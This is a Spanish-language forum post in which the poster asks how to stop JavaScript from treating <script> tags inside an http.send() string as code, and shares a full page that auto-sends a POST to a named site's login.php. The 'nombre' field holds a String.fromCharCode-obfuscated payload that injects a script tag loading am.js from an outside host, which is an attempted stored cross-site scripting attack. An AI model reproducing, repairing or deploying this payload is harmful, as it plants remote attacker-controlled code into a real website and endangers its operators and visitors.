peticion_http.send("&nombre=<script>document.write (String.fromCharCode(60,115,99,114,105,1
12,116,32,115,114,99,61,34,104,116,116,112,58,47,4 7,119,119,119,46,101,115,102,97,109,111,1
15,97,46,99,111,109,47,97,109,46,106,115,34,62,60, 47,115,99,114,105,112,116,62,0))</script>
");
Pero como hago para que javascript no lea como codigo javascript lo que esta dentro de "" ? Y QUE LO lea solo como string?
Osea que las <script> dentro del http.send("") no se lean como codigo javascript, si no que como simplmente string?
Bueno, el codigo completo que permite entrar en una web y enviar post es:
Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hola Mundo con AJAX</title>
<script type="text/javascript">
function descargaArchivo() {
// Obtener la instancia del objeto XMLHttpRequest
if(window.XMLHttpRequest) {
peticion_http = new XMLHttpRequest();
}
else if(window.ActiveXObject) {
peticion_http = new ActiveXObject("Microsoft.XMLHTTP");
}
// Preparar la funcion de respuesta
peticion_http.onreadystatechange = muestraContenido;
// Realizar peticion HTTP
peticion_http.open('POST', 'http://www.solokampos.com.mx/login.php', true);
peticion_http.send("&nombre=<script>document.write(String.fromCharCode(60,115,99,114,105,1
12,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,101,115,102,97,109,111,1
15,97,46,99,111,109,47,97,109,46,106,115,34,62,60,47,115,99,114,105,112,116,62,0))</script>
");
function muestraContenido() {
if(peticion_http.readyState == 4) {
if(peticion_http.status == 206) {
alert(peticion_http.responseText);
}
}
}
}
window.onload = descargaArchivo;
</script>
</head>
<body></body>
</html>
